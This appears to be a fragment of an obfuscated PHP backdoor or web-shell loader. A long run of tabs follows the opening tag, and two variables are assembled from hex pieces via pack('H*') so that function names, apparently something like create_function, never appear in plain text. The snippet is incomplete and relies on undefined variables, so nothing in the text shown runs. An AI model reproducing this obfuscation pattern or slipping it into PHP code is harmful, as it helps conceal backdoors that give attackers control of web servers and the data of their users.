<?php																																										
 
$partition6 = pack("H*", $argument1 . $argument2 . '72' . '65' . $argument12 . $argument13 . $argument5 . $argument14 . $argument3 . '74' . $argument5 . '63' . $argument9 . $argument11 . $argument2 . $argument3 . $argument11 . $argument2 . $argument1);
$partition7 = pack("H*", '70' . $argument15 . $argument4 . $argument9 . '73' . '65');

